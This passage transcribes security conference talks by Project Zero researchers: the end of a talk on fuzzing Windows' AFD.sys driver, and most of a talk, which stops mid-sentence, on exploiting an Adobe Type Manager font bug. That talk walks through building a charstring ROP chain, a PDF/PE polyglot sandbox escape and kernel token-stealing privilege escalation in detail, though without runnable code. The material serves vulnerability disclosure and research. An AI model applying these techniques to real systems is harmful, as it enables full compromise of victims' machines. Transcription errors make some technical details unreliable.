with it. And you could compile this right into shell code. And the really cool thing about, about doing something like this is that it would apply feedback into a more intelligent fuzzer. So instead of fuzzing with these Ioptical calls, you then fuzz off of the library. And that's something that's about half implemented before we, we stopped research on this. So the intent was to provide some level of assurance that, you know, AFD is not going to follow over with, you know, three or four weeks of analysis. I think we could, I think we could fuzz better. We could fuzz at scale and we could build out the data structures that it's expecting a little bit more. And if it's useful, I don't know how many devices are out that have sand, sand access in them. We could, we could fuzz the sand functions as well. So that's my talk. It is a 30 minute talk. So kind of a short brief intro into WinSock and AFD. Big thanks to Google and Project Zero and James Forshaw for supporting this research and encouraging me along the way. Happy to take any questions that you have about Project Zero, AFD, anything along those lines. No heckling? Yes. Oh well. Mike. I just wanted to ask about personal curiosity. Have you tried to do some, this kind of research with NDIAS or a Windows Soccer Corner Driver? No. So we were not so much interested in that under the sandbox sort of focus. Okay. Thank you. There's one behind you. Hi. I have, I guess a general question that goes with what you two are doing. Do you guys document your fuzzers at all or, you know, kind of provide any frameworks or baselines for what you guys are doing there? Yeah. So we, we certainly released fuzzers to Microsoft in the past. We've released, well not Project Zero specifically, but the team members on Project Zero have released open source fuzzers. Our experience is that they've largely sat on the shelf, so it's not something we strive to do. If it is requested, certainly we can release it. I think for this one in particular, if we're going to go back to it, I'd focus on the native AFD library first and then build a fuzzer around that and possibly release both. Okay. Thank you very much.
|
What happens when you make a socket() call in Windows? This presentation will briefly walk through the rather well documented winsock user mode framework before diving into the turmoil of ring 0. There is no map to guide us here. Our adventure will begin where MSDN ends and our first stop along the way is with an IOCTL to AFD.sys, or the awkwardly named ancillary function driver. This driver is of particular interest because it is so widely used and yet most people that use it do not even know it exists. Nearly every Windows program managing sockets depends on this driver. Even more interesting is that the device created by AFD.sys is accessible from every sandbox Google Project Zero looked at. In fact, there isn't even support to restrict access to this device until Windows 8.1. Staying true to Windows style AFD.sys is a complex driver with over 70 reachable IOCTL’s and support for everything from SAN to TCP. It is no wonder that this driver weighs in at 500KB. This complexity combined with accessibility breed a robust ring 0 attack surface. Current fuzzing efforts will also be shared in this presentation and the time we are done you should have a good idea of what happens when making a socket() call without having to spend hours in IDA to figure it out.
|
10.5446/32820 (DOI)
|
Okay, thank you. So welcome to my talk. Today we will be talking about fonts again. This is the second font stock at recon. But it's not about GTF, but it's about post-tripped fonts and specifically about the research that I performed regarding post-tripped font security. So about myself, I also work on project zero, similar to Steve. I am passionate about low-level software security, as you will see. I also play CDFs. I am the vice captain of Dragon Sector. And I have a blog and Twitter. I don't post there very often. But I will definitely put the slides and some additional details about the research, which is by the way quite extensive. So in this talk, I am only actually talking about the exploitation of one epic bug that I found. But there are more bugs. And I think all of them are quite interesting. So I will be following up with some additional information about all of those findings later on. So if you are interested in the stock and the details, then be sure to check these things. So today we will talk about, first we will talk about the general structure of type one and open type fonts. Then we will talk about what Adobe type manager font driver is in the Windows kernel and what other code bases also share the same code, because this is actually going to be quite an important part of the talk. And then we will talk about exploitation of one specific vulnerability, which has two CVs assigned to it, but it is actually one bug. First we are going to own Adobe reader 11 on Windows 8.1 30-bit. And then we are going to do the same thing on 64-bits with the help of another vulnerability. And then I will provide some final thoughts. So let's start with a very short primer of post script fonts. Basically, they now have over 30 years. Adobe introduced them in 1984. Actually, they introduced two types of post script fonts, type one and type three fonts. The first type makes it only possible to use a subset of the post script functionality and type three fonts can use all of it. And type one fonts are actually the common formats that we are going to talk about. And they were all originally closed formats. Adobe only released a specification after a few years after Apple started working on a competition format called TrueType. So the general structure of the type one fonts is very simple. It's basically like a post script file containing dictionaries and primitive types, such as integers, numbers, real numbers, and some other stuff. And they also have some nested dictionaries. And overall, it just basically specifies it's just several numbers specifying the properties of the font. And apart from this, in type one fonts, you also have something called char strings. This is going to be a word that I'm going to be using a lot today. And char strings are basically like post script programs that are used to actually draw all of the outlines of a glyph. So here you can see an example of char string, which consists of immediate values that are pushed on the post script stack and also some operations that are being performed using those values. So overall, this char string draws the add character in one of the fonts that I took. So overall, the execution context of char strings in type one consists of three main parts. We have the instruction stream, which is basically like a buffer with all of the instructions that are encoded inside of the type one file. Then we have something called the operant stack, which is basically the stack that we also have in post script. In type one, it is able to store up to 24 numbers, which are 32 bits. And interestingly, char strings instructions actually take different parts of those values. So some of those use the full 32 bit and some of those use only 16 bits of those. And we also have something called the transient array, which is also going to be very useful to us today. And it's just a helper value that is not a stack. It's just an addressable array that we can control to some degree. So we can control the length of it using a numeric value inside of the dictionary. And we also can initialize it using a built array in the private dictionary of the font. So it's not really documented anywhere that I know of, but still most interpreters implement it. So this means that probably some font started using it and then the projects were forced to implement it. So when it comes to the operators themselves, so the instructions, we have several types of instructions. They are mostly about just drawing the glyphs. But there are also some arithmetic commands and subroutine commands because there are subroutines in type one. And also we can just push values to the stack using the byte range 32 to 255, which varies in the length of the instruction in order to be able to encode the full 32 bit range. So here we can see a short excerpt of the operators that are available in type one fonts taken from the official specification. So there isn't too many of them. As you can see, most of them are related to just drawing lines and other stuff like that. We have one interesting instruction which is called diff. So this is the arithmetic instruction. And yeah, in general, we have an escape instruction which can encode some more interesting ones that didn't fit into the original encoding. And as you could see, some of those ideas were missing. And it wasn't really, it's kind of weird to look at this list, but the reason for this is that basically between the time that the specification was released and today it was actually evolving very dynamically. So the specification changed, introducing some operands and operations and removing some others. So that is basically the reason for this. And another interesting property of type one fonts is they have to be, there have to be at least two files in order to load them at least in the Windows system. So we need a PFB file which is basically the core of the font. And we have the PFM file which is the matrix file. And there is also a third file that is optional which is related to multiple master fonts. So just a brief introduction into multiple master fonts. It's basically an extension of type one fonts that Adobe introduced several days, several years after type one fonts. And it just makes it possible to specify two or more masters that you can interpolate between in fonts to be able to get different results and not be dependent on the specific shape of the glyph, but have it more dynamic. So this is an example of how this would seem. But yeah, multiple master fonts were only supported in Adobe type manager released in 1990. And it was the first program by the way to properly also rasterize type one fonts which is kind of obvious because Adobe was the inventor of the format. And multiple master fonts weren't really adopted worldwide. Partially due to the advent of open type. So there are only a couple of multiple master fonts existing in the world anywhere. Mostly created by Adobe itself. However, the interesting thing is that they are supported by Microsoft GDI. So ATMFD in the kernel and also Adobe reader. When it comes to open type, it was released by both Microsoft and Adobe which works together to create something that would supersede both through type and type one fonts. And it's basically more of the same. There are several major differences such as there's only one file required instead of two in order to have the font loaded. Previously textual data such as the dictionaries that were at the beginning of the file were converted to compact binary form. So they consume less space. And the charge stream specification which is the most important part was significantly extended. So they introduced a lot, lot, lot new instructions and also deprecated or removed some of them. So here you can see the list of operations or operators from the open type specification. You can see that there are a lot more. So specifically they introduced a lot of new instructions for drawing glyphs and for hinting so that the fonts would be rendered nicely at small point sizes. But there is also several new instructions that are very interesting possibly from the exploitation standpoint because there are like new arithmetic and lodging instructions such as and or not absolute value, addition, subtraction and stuff like that. We also have some new instructions for managing the stack so we can duplicate the top stack value, we can exchange values on the stack, get a specific, get a value from a specific index on the stack and stuff like that. There are also some very weird instructions such as for example the random one which is supposed to insert a random number into the operand stack. I don't really know why a font would like to have any nondeterministic step inside of charge stream but it was in the documentation. And yeah, so that's mostly the interesting stuff. And if we also look at the open type specification at the very end of it, there is a very interesting table which specifies all of the limits for all of the structures that should be used for implementing open type and charge strings. So that is actually a very good starting point for vulnerability hunting so we can verify that all of those limits are actually followed by the implementation that we are looking into. So now let's look into the Adobe type manager software. Basically, it was created by Adobe to render type one fonts and it was ported to very early versions of Windows by patching into very low level of the operating system in order to provide kind of native support for it. But Windows and its architecture made it kind of impossible to do it anymore. So first Microsoft would allow converting type one fonts into true type during system installation and later on in Windows NT4. They added the ATM as a third party font driver called ATMD.dll and it's there until today. It's still in Windows 8.1 rasterizing our post script fonts. So why am I talking about all of this? Well, basically due to the vast collaboration of vendors during the early days of font development, if one vendor created an implementation for a specific format, they would often share it with the other vendors in order to make sure that it would be widely adopted. So that's also what happened with Adobe. So they licensed the code to Microsoft as ATMD and then Microsoft used the code in Windows GDI. So the Windows kernel used to does this to render the fonts. There is also the direct write library which is a user-land library which renders fonts and it is used in, for example, web browsers such as Internet Explorer, Chrome, Firefox, et cetera. There is also Windows presentation foundation which uses the code and there's obviously Adobe Reader by Adobe itself which also has the same common ancestor as all of those other products. And the important part is that if we find a single bug in the post script font implementation, OTF or type one, then it's very likely that this bug or some other bugs might be also common across the other products. So this is kind of scary from a security standpoint. But there is some good news. If you think about it, it's only the common ancestor of those different code bases. It's not really the same branch. So it's been living in different branches maintained by different groups of people since like many, many years. So it also received a very degree of attention from the security community because some people are only looking bugs in the Windows kernel and aren't probably checking if the same bugs apply to Adobe Reader, for example, because they are not interested in that. So the good news would be that they don't have to be really affected by the exact same set of bugs, right? But this is also bad news and I think it's more bad news than good news because you could actually take all of those different code bases and cross-div them and check what sanity checks exist in some of them and don't in the others and derive real zero days from that. So it's not a very good situation. So what I decided to do is to manually out it the TrimState machine that was implemented in Adobe type manager and see if I could find anything there and maybe something that would also reproduce in other software. So let's start with a quick primer into reverse engineering at the MFD. The first thing you see once you load it in IDA is that it doesn't have the symbols available from the Microsoft symbol server because it's basically not Microsoft Output code so they don't make the symbols available. We unfortunately have to stick with unnamed names, sub and address or whatever. So this is actually quite a bit of interesting information that we're missing. And I suspect that this might be a reason why it was less thoroughly audited compared to Win32k which has all of the symbols available because the entry bar is actually quite higher. But if we think about it and if we recall that there are shared code bases, maybe we can actually make an advantage of the fact that DirectWrite and Windows Presentation Foundation are shared the same code. So maybe we could see what the symbols are in those libraries and then in some way put them to work with ATMFD. And it's definitely possible. We can do it with some functions but there's another very interesting way which is something that Halvar Flake noticed. And the thing is that Adobe some long time ago actually released some builds of Reader with debug symbols enabled. It was Reader4 or AIX and Reader5 for Windows. So this also included the Fontengin cool type. And since the code, even though it was very, very old, it is very, very old right now, it hasn't really changed fundamentally. So there are many things that you can take from the old cool type, many symbols that you can actually just take and put into ATMFD and they will work because the functions are very similar. So yeah. This is basically like several function names that are quite useful from the old version of cool type. And there is also a bright side. There are some things in ATMFD that help us, reverse engineering it. First of all, there are a lot of debug messages. They are not really printed out. So there aren't any debug print function calls but there are some function calls that are actually like stops that could have been enabled and probably are enabled in some debug builds but they are not enabled in the release builds but the debug strings are still there. So we have things like variable names both local and global. We have some function names, the conditions that the ATMFD wanted to be met but haven't been met in case of some assertions. We also have some source file paths and stuff like that. So it's a lot of useful information. And there are also like type 1 font string literals. So the names of the fields that are expected in the dictionaries of type 1 fonts. You can see some of them here. There are really a lot of them and they are very useful. So if we wanted to find the single function, the interpreter that does all of the char string processing, it's really not a very difficult task because first of all it has a lot of cross references to debug messages which are directly related to char strings. As you can see here, for example, such as messages saying operand staggo underflow or argument counter at and the name of operator from char string. And second of all, if you look at the list of functions, the function is actually the largest one in the file. It has over 20 kilobytes and it's like five times larger than the second largest function in the file. So it's really enormous. It looks like this in IDA and I actually had to increase the maximum limit of nodes that IDA would be willing to render as a graph because 1,000 wasn't enough. So it's really huge. And if we want to have a confirmation that this is actually the right function, we can take a look at direct write or Windows presentation foundation and see that this, the name of the function is actually type 1 interpreter char string or in the symbolize school type, it's do type 1 interpreter char string. And what the function is, you could also see it in the graph before, is that it's a giant switch case statement handling all of those different instructions in line inside of this function. So it's quite simple in general. It's just, it basically reads a byte of the char string and then performs the switch case expression. And one other interesting or important thing is that the post script operand stack, which in open type is 48 elements long, is also on the local stack of the interpreter function. It's called OP SDK or OP operand stack. And this is the name that was used in debug messages from ATMFD. So I know for sure that it was like that in the source code. And we also have a pointer to that called OPSP, which at the beginning of the function obviously points at the beginning of the array. And the array is in the same context as the return address and the other stack frames and stuff like that. So the question is, like very important question is, why is the function so large, right? Because there aren't that many instructions. And so first of all, the function is responsible for both executing type 1 and type 2, which type 2 are open type char strings. So it is used for both of them. And this could be useful because type 1 fonts now have access to all of the open type instructions and vice versa. And the other thing is that ATMFD actually implements every single feature that was ever part of any of type 1 or type 1 or open type specifications. So even if the given feature was only there for like a year or two and it was long forgotten, ATMFD still supports it. So even the most obsolete, deprecated or forgotten ones. And yeah, so I was really enthusiastic when I learned about all of this because it's like basically the perfect starting point for a vulnerability researcher. And I just wanted to sum up the findings that I had during this research because I'm not going to be talking about all of them. So there were some quite low severity bugs that were just like doses in ATMFD or small memory disclosures. There was also very interesting memory disclosure that affected all of those code bases. So you could use the one bug to actually disclose memory from the heap of Internet Explorer and Adobe Reader and Microsoft Windows Kernel. So it's another one bug to rule them all. And there were also quite a few bugs that had high severity so they could lead to remote code execution or elevation of privileges in the Windows Kernel. And the three most important one were found in both Adobe Reader and the Windows Kernel, including the one that I am going to talk about. So the bottom most one. So yeah, let's look into the bug. Basically, it allowed remote code execution in Adobe Reader and elevation of privileges in the Windows Kernel or perhaps also remote code execution in the Windows Kernel as well. Unfortunately, it only affected 32-bit platforms, but as we will see, that might not really be a huge problem. And it was reproducible with just Type 1 fonts. But Adobe Reader and Windows Kernel supports Type 1 fonts so that it's not a problem as well. And in order to understand the vulnerability, we have to look into the operator that it is in. It's in the blend operator. That's why the bug itself is called blend vulnerability by myself. And it's related to the forgotten multiple master fonts. The blend operator itself was introduced in 1998. And it was only there for like two years. Then it was deleted. But obviously, ATMFD still has support for it. And I'm not really going to be talking about the details of what it does on a logical level. But for us, it's important that it pops K times N arguments from the operand stack, where K is the number of master designs which is equivalent to the length of a wide vector table specified in the private dictionary. And N is a controlled signed 16-bit value which is loaded from the operand stack. So it pops a semi-controlled number of arguments from the stack and then pushes N values back. So if you look at the code, you can actually see that the interpreter or maybe the developer rather had a very good intention to verify that the specified number of arguments are present on the stack and that everything will go fine. So there is a check whether the stack pointer is within the bounds of the stack buffer itself and there is a check whether there is at least one item on the stack which is the N value that we're going to pop. It also checked whether there are enough items on the stack and if there is enough space to push their values onto the stack later on. And you could also see that what some of those conditions actually were inverbating because they were in the debug messages as well. But it turns out that even though they made a lot of effort to actually check all of those conditions, they missed one corner case which is a negative value of N. So a negative value of N passed all of those checks and it reached the doblend function which did three things which I described before. So it loaded the input parameters from the stack that did some computation called blending operation and pushed the resulting value back. So from a technical point of view, what happened is just OPSP is decremented by this expression. The times 4 obviously comes from the fact that 4 is the size of operands on the stack and yeah, it's all pretty trivial. So what happens for a negative N is that no actual popping or pushing takes place in the doblend function but the operands stack pointer is actually adjusted accordingly to the formula that I've shown. So with a controlled 16 bit N, we can actually arbitrarily control the stack pointer beyond the operands stack array. And it is a security boundary because normally the stack should always be within that local array. So it turns out we're quite lucky because even though we can do it, at the beginning of the main interpreter loop, there is a check whether OPSP is not smaller than OPSP stack and if it is, then basically execution is aborted. But there is no similar check for whether OPSP is larger than operands stack so whether it hasn't gone beyond it from the other side. And thanks to this, we can actually have this inconsistent state with the out of bounds pointer and still execute further instructions, which is very good. So what we can do with this is that if we set a very large and the maximum length of wide vector is 16, so if we set it to 16 values, then we can increase the operands stack by as much as almost two megabytes on the stack. And this is well beyond the stack area itself. So we could maybe point it to somewhere else such as like the heap or pool or executable images, etc. But if we set it, the wide vector to something to an array, which is length, which is of length two, then we can have very great granularity of the access of the control of the pointer. So if we just issue a two command minus X blend sequence, then we can set OPSP to any offset relative to operands stack with the granularity of four bytes. For example, if we look at the stack frame of the interpreter function, what happens is that if we have the operands stack and then the difference between the beginning of the operands stack array and the return address is 349 dWords, then if we push minus 349, then perform the blend operation, the pointer will go out of bounds, and then if we perform the exchange operation, exchanging the two top values on the stack, what we will do is we'll just flip the return address and the saved ABP value. And if we then issue an enter command, we will force the return from the interpreter function, and obviously everything will go bad. We will get a blue screen of death showing that the processor tried to execute non-executable memory, which is the stack. So this is obviously quite bad. But it gets even better because it turns out that we can use all of the supported operators from the char strings, such as addition, subtraction, the other arithmetic stuff. And this is pretty much sufficient to create a full ROP chain using just char strings itself. And yeah, so as a result, the bug enables the creation of 100% reliable char string on the exploit, which subverts basically all of modern exploit mitigations. Stack cook is obviously because you can control where on the stack you modify data, depth, ASLR, because you can just build a ROP chain for yourself, SMAP, et cetera. Both Adobe Reader and Windows kernel were affected, so this means that you can get RCE in Adobe Reader and then EOP in the Windows kernel using this single bug. Yeah, that's pretty interesting, I guess. But yeah, 64 bits is kind of a problem, as I said, because if you look at the code, then it turns out that the end times master design's expression is cast to unsident before it is added to the 64-bit pointer of operand stack. And then if you specify a negative end value, then the whole, the full expression will fail. So the if will execute and we will just be aborted. But the fact is that there are no 64-bits version of Adobe Reader to my current knowledge, so we can still own all of Adobe Reader. And for 64-bit Windows kernel, we have still some other font bugs that we can exploit to get EOP. So some actual exploitation. Okay. So the overall goal would be to prepare a PDF which pops out calculator in the latest Adobe Reader that is affected by the vulnerability on Windows 8.1 for both 32-bit and 64-bit versions of Windows, make it 100% reliable, achieve high integrity level, obviously, or anti-authority system security, token for the calculators of this means that we want the full system compromise, subverting all available exploit mitigations because the vulnerability allows us to do this. And since there are now 64-bits of Adobe Reader, we can just create a single PDF that will exploit the vulnerability. And then inside of the second stage payload, we can differentiate between 32-bit and 64-bit kernels. And then we can just add and attack them accordingly. So let's start with the userland exploit. So it's really not that great, as I said before. So even though we can set the OPSP pointer well outside of the local stack array, not really all operators will work then. And specifically, all operators that actually increase OPSP check if it's still within bounds in order to follow the rule that the pointer should always point within the local array. So this, for example, makes it impossible to write constants in the normal way by just pushing values there because we will be aborted immediately. And some other instructions that us duplicate, pop, call, subroutine, random, etc., are forbidden as well. So here is an example. Basically, you can see that the first thing that the random implementation does is that it checks whether the OPSP is not larger than the end of the stack. And if it is, it just aborts. However, we're not really lost in this situation because there are some comments which write to the stack but do not increase the stack pointer because it also pops some values from the stack before that. And if that happens, so in case of those instructions, they actually don't check the OPSP pointer at all because they don't really have a reason to do it because if all of the instructions that do increase it check for the condition that, in theory, it should also be fine in cases of those instructions that don't increase it. So the lack of this safety net basically makes this vulnerability exploitable. And there aren't too many trust string instructions which makes as possible to write to the stack. But it's a few of them. So we have arithmetic instructions, addition, negation, division, blah, blah. We also have some other interesting ones such as get value from the stack and get value from the transit array and we can exchange values from the stack. So maybe we can try to do something with this. So, well, if we think about what we can do in this condition, we could maybe try to use the index instruction. That was my first thought because it replaces the top stack item with the one X items below the top where X is the original value from the stack. However, it couldn't really work because we don't really control the X under our operand stack pointer, right? And also, the arithmetic instructions don't really help us either because we don't control the original instructions and they do require controlled operands for us. But it's not really hopeless. There is this one other instruction that caught my attention which is get and it replaces the index with the value from the corresponding index from the transit array. So the first idea was that since the index is only 16 bits, maybe we could put the value that we want to put into the stack at a specific place into all of those transit array entries and, of course, make it sufficiently long so that it is full of those values and then we are sure that the index will work in the array and we will get the right value. But there are obviously some problems with this. First of all, over 65,000 of instructions just to put a single constant at a single specific place in the stack. It's not really very efficient. And the index is also a 16 bit value. So if the original value was a negative number that get would also bail out. But the absolute instruction maybe could fix this but I haven't checked. However, there is a much more smarter way to do it because we actually can control the value somehow which is basically directly under OPSP and this is the square root instruction. So what the square root instruction does is that it just puts a square root of the previous value on the stack in place of the old one. So the idea is that after five subsequent invocation of the instruction, whatever was originally on the stack, we end up with either zero if the original value was zero or one if the value was nonzero after five invocation of square root. This is kind of obvious. And then if we perform these operations and we use the get operation, that the operand for the get operation will either be zero or one. So let's see an example of how we could write some data to the stack. Let's say we want to put the value 31337. So we first put it on the operand stack, duplicate it, then put it into the transient array indexes zero and one using the put operations. Then we shift the operand stack pointer using the blend bug. So we put a minus 100 and then blend. Okay. Then we just execute five square root instructions so we can see that the original value is basically decreasing until the point where the highest 16 bits which are the argument for get become one and then we just issue the get instruction which fetches the data from the transient array. And we have the control value on the stack wherever we want. So the other thing that we would like to want to create a full ROP chain is read existing data from the stack because we cannot really create a ROP chain just based on inserting constants. So we have to perform some operations based on existing data from stack for example to create to calculate the addresses of ROP gadgets. So we can use a similar trick. We can just use the square root instruction to either also get a zero or one and then use the put instruction to put the value which is before the zero or the one into the transient array. And then if we pre-initialize the transient array, the first two entries to zeroes and then after we reach the value, we sum both entries, we will basically end up with the value that we want. And another thing that we would like to do is have the operand stack pointer reset back to the original address of the beginning of the operand stack so that we can perform further operations there. And it turns out that there is a set current point instruction which does exactly that with no side effects. So let's see another example. We basically just put a zero, duplicate it on the operand stack, then put the two zeroes inside of the transient array to allocate, sorry to initialize those two entries. Then we again shift the operand stack pointer, sum five square roots. Then we put the value that we want into the transient array. It will be index one because the original data was not zero. Then we reset the stack pointer. We get both transient array indexes zero and one into the operand stack with two get instructions. We then sum both of those numbers. And at this point, we have read our number, our value from the stack. So at this point, we can perform any operations we like. For example, we can subtract a specific value from that address in order to get the base address of some library that we want to use for rope chaining. And so this gives us all we need to actually create a reliable rope chain. And we can now think about what the rope chain could do to make it as elegant for us, make it as elegant as possible for us to continue the exploitation. So one thing would be to call a library with the path to the exploit PDF itself. Because the PDF magic doesn't really have to appear at the beginning of the file. It can be somewhere later on, I think in the first kilobyte or something. So we could just create a binary polyglot which would be both a PE and a PDF file. And the PE file would be a DLL that has the second stage code that we can execute. And Anzha Albertini has already done it as a proof of concept in 2012. However, there are two problems that we have to overcome. First of all, the problem is that there is no pointer to the path of our file on the threads stack. So we cannot just copy the address of the string and provide it as parameter to load library. And the other thing is that for whatever reason, I don't know really what it is, is that Adobe Reader recently began rejecting PDF files that start specifically with the MZ signature. So that won't work so easily. So we have to settle for a less elegant solution that is quite standard. So we would like basically to call virtual protect over stack in order to make it both readable, writable and executable. And then also put the first stage payload there. And that's it. And then have it executed. And the first frame of the Rop is just cool type internal implementation of the get proc address which takes a value of a function inside of kernel 3332 and then just jumps to it directly. So it's pretty simple. It's just several d-words of the Rop. And you can see here in the debugger that it works. We have like arbitrary code execution inside of Adobe Reader from the stack. That is very good. Okay. So even though that works, I wasn't really convinced to writing a second stage font related Win32k exploit in assembly in order to attack ATMFD. It's definitely possible, but it's a bit of a pain, I guess. So I still wanted to have a control DLL loaded via load library after all so that I can write the second stage payload in C++ preferably. And to our advantage, first of all, the renderer process at the time of the exploitation holds an active handle to the exploit PDF file with read access. And secondly, even though the rendered, the sandbox process is quite limited when it comes to writing capabilities to the file system, it can write to a temporary directory in update add of your CROBAT 11. So the idea would be to compile a second stage DLL with the exploit PDF file specified in the tab linked linker option in Visual Studio in order to create the polyglot. Then replace, of course, the two first magic bytes with something else, for example, small emz letters. That way we create the PDFP polyglot. And then in the assembly payload, what I decided to do would be to iterate over all possible handle values within some sensible range, and get the name of each of the objects of the handles and see if it ends with.pdf if it is. Then I just assume it's our PDF file because it's the only one currently handled by the renderer process. And I would write back the original emz signature after copying the file into the temp temporary directory and then invoke load library over that file within the temporary directory. And you can see that after I did it, it worked pretty well. I could actually write C++ second stage payload and it would show as a message box inside of Adobe Reader. So I could now write C++ code that could elevate privileges pretty conveniently. So as I said before, we can only, we can have a single second stage DLL because there is only one bit of Adobe Reader. And it can basically exploit both 32 and 64 bit kernels. We must only recognize the underlying system using a single API function and then we can drive exploitation accordingly. In both cases, we have to create a window and then the only difference is in the window procedure. So about rendering the font because in order to attack ATMFD to trigger the vulnerability, you actually have to render the font or at least try to get it rendered. So this requires several API calls to achieve. So that's creating the window and then loading the exploit font into the system, creating a handle to the font, selecting it and then finally drawing some text using that font. And turns out that all of them actually work fine inside of the sandbox because Win32K access is not locked in Adobe Reader except one function and yeah, the most important one, loading the font. So what I saw is that Win32K doesn't really want to load any fonts via the function, which by the way takes the file name of the font that we want to load under the Adobe Reader sandbox. So that's a bit of a problem. And if we look at the documentation, we can see that there is another function for loading fonts in Windows. It's called add font memory source x, which installs fonts directly from memory. So that would be convenient because I assume the problem was and it actually was in file system access. However, it didn't really provide any means of loading a font consisting of two files. So it could very well load a TTF file or an OTF file, but we needed to load a type one font and we couldn't really do it with this function and people on the Internet have also been wondering and they didn't find the solution. And I also confirmed that it was actually a problem by reverse engineering Win32K. And there are no other official or documented functions that we could use to actually load type one fonts. But obviously we are reverse engineers, so we can open up Aida and see what our system calls there might be that reference the font loading code. And it turns out that there is one font related system call as well that is not documented anywhere called anti GDI add remote font to DC. And if you type that into Google, it will result in zero results basically, either officially or unofficially. And if we strip the anti GDI prefix and just Google for the rest, then we will see that there is one result which is the description of Microsoft's patent. So if we look at the description of the patent, it basically just says that the function can be used to load fonts from memory. Similarly to other functions. Doesn't really give us too much information. We have to dig by ourselves. And fortunately, it's not similar to the other function that I mentioned. It's not just raw buffer with font data, but it's font files that are preceded by a header that specifies what the partitioning of the memory is and where in memory each of the files that we want to load is. So I had to reverse engineer the structure and it contains like a number of fields that are pretty easy to figure out how to initialize them. So we just have to initialize the is type one font to one that will make Win32k to assume that we want to load a type one file. And we can just say that the number of files is zero because Win32k will anyway know that we need to load two files and then we specify the offsets of the files. And then after that, we just put the data of the files. And after we do this, I confirm that Win32k will successfully load the files, the type one font from memory, and we will reach all of the relevant atmfd code paths so we can actually attack atmfd. So one thing we have to consider is that where do we put all of those kernel exploit fonts? Because since we want to create a single PDF of Doom, which is just a single file that attacks everything and pops cocks everywhere, we have to embed a lot of information there. So we can also either put the kernel exploits in PE resources because it's a DLL or we can just append it at the end of the file. So this is the structure of my proof of concept file. You can just see all of the information that I mentioned before. So you have a polyglot of PDF and PE which exploits Adobe Reader. And then after that, we have some padding and the exploits for 30 to bit and 64 bit exploits of the Windows kernel. So let's write a kernel exploit. 30 to bit. Let's start with 30 to bit because there is this is the same vulnerability that we can use with Adobe Reader. So if you know a little bit about Windows kernel and how it stores objects in memory, you know that elevation of privileges is fairly easy. You have to just find like a process that you know that is very privileged and you have to copy the security token of the process and copy that inside of the structure that describes other processes that you want to elevate and it can be really easily implemented in a short snippet of 86 assembly. So our ROPS goal in ATMFD would be to first allocate writeable executable memory, copy the EOP shellcode there, jump to the shellcode and have it do its job and then what is also important, we have to cleanly recover from this whole condition because we don't really want the operating system to crash at that point. So it should be fairly easy overall because the trashing exploitation process is exactly the same as with Adobe Reader. The blend instruction works in the same way. What is also convenient is that the addresses of ATMFD.dll, Win3rd2k.sys and NTOS kernel are all on the stack so we can make use of all of ROP gadgets from all of those three modules. And starting with Windows 8, most kernel memory allocations are allocated from a pool that is non-executable so we cannot reuse some other pool allocation that was allocated from such pools. We have to create an allocation by ourselves specifying the non-paged pool flag which still allocates normal executable non-pageable memory that we can use to store the payload. So this is how the ATMFD ROP payload looks like. It's also very, very simple. So we just allocate some memory and then we adjust the registers like ESI, EDI and ECX to point to the right memory regions. We perform a copy operations to copy like 128 bytes or maybe some more into the new allocation and then we just jump into it. And of course we have to have the EOP payload on the stack as well to be able to copy it to the new allocation. And after we do this, we can see that it works as well, pretty well. We have the kernel mode execution in ATMFD. So what we have to do now is just write the EOP shell code itself and it's just about, as I said, just traversing several kernel mode structures and replacing some pointers. The only interesting thing here that I didn't mention is that we have to also, if we want to spawn calculator, we also have to change the active process limit assigned to the job to more than one because otherwise we will not be able to create another process within the job. So yeah, so since we haven't spawned our calculator yet because we are not able to do it, I decided that my shell code is just going to elevate the privileges of the Adobe Reader 30-bit process and then after we have this, we can do anything from our second stage DLL. And then at the end, we are just jumping to other zero. So yeah, this is not really obvious why that would work because it shouldn't really recover cleanly, but it turns it does because ATMFD provides a rather performance very aggressive exception handling and it handles all invalid user mode memory references and just ignores them as if nothing happened. So it's actually not very nice for people that are fuzzing, for example, open type fonts because then if there was ever an exception that resulted in invalid user mode memory, the fuzzer would never know about it. But on the other hand, it's quite convenient for us here because we can just jump to other zero and ATMFD will just take care of the rest and return to user mode as if nothing happened. So we can see that it worked as well. We can see that the payload once executed actually elevated the privileges of the two processes of Adobe Reader. And the final step would be just to pop up a calculator using create process. But after several minutes of trying to make this happen, I realized that Adobe Reader hooks the current base create process a function. So we just have to restore it to make it work. And yeah, this is very simple. We just put the original five byte function prologue inside of the memory. So I have a live demo that I would like to show you. I have two virtual machines prepared. The resolution is pretty low, but I think it should work anyway. So we have the Poc.pdf file. Let's first see that the version of Adobe Reader is what we want. It's working really slowly. But yeah, it's 11, 0, 10. And we can also see that the operating system is Windows 8. Well, it's kind of obvious. So we can just open the file. Okay, so the calculator popped up. And then we can also see that it has elevated privileges. Maybe I will do a magnifier to make it better visible. So there is Calc. That is, yeah, it's not working very nice, but you can see that calculator has elevated privileges. So yeah, that's the 32-bit full system compromise using one vulnerability. Okay, so I think I still have a little bit of time so I can discuss the 64-bit exploitation of Windows kernel. So obviously, as I said before, we cannot make use of the previous bug because it doesn't exist or rather it's mitigated by how the code was written. So we have to use some other bug. And I had three options when thinking about it. There is a write-with-wear which works via an uninshiced pointer from the kernel pools. There was a control pool-based buffer overflow and a limited pool-based buffer underflow. So I thought that the first vulnerability would actually provide the best primitives for us to perform the exploitation itself. So let's learn about the vulnerability. It also makes it possible to do elevation of privileges as I will show. And it reproduces on both architectures and with type 1 and open type phones. So in order to understand the vulnerability, we also have to look back at a very old specification from 1998 where the registry object was defined. So a registry object is also related to multiple masters which by the way were being tried. We introduced to the open type format for a while but since it failed, they dropped the idea. And it was also subsequently removed from the specification in 2000 with all of the other multiple master related things but of course, ATMFD supports it. So we have to learn about two new instructions in charge strings called store and load. And these two instructions basically copy memory between the registry object and the transient array. So the registry object is just an array of say three pointers and these pointers hold the addresses of some allocations. So we can address the registry object using index 0, 1 or 2 as set in the specification. And yeah, this is the nice part. So it says that if we try to do an out of bounds index, the result is undefined which is also always a good sign in a specification because they might have got it wrong. And internally, the registry items are basically stored inside of a, they are stored as a three item array of registry item structures. We just store the size of the item and pointer to the item. And the verification of the registry index does of course exist because the bugs are not that trivial. But can you spot the bug here in the listing? Obviously, they are checking with the index that we specified is larger than three but they really should specify, should check for whether it is larger or equal than three because the only valid indexes are 0, 1 and 2. So this is a one of, of by one vulnerability in accessing the registry array. And as a result, using the load and store operators, we can actually trigger the following mem copy calls. We have controls transit array and size. So we can either, we can either copy into the pointer that is specified by the third entry in the registry array or we can read from it. Of course, provided that the size of registry item three is larger than zero and we have to remember that the variable is of type signed. So the registry array is part of the overall, like, very large font state structure. And what 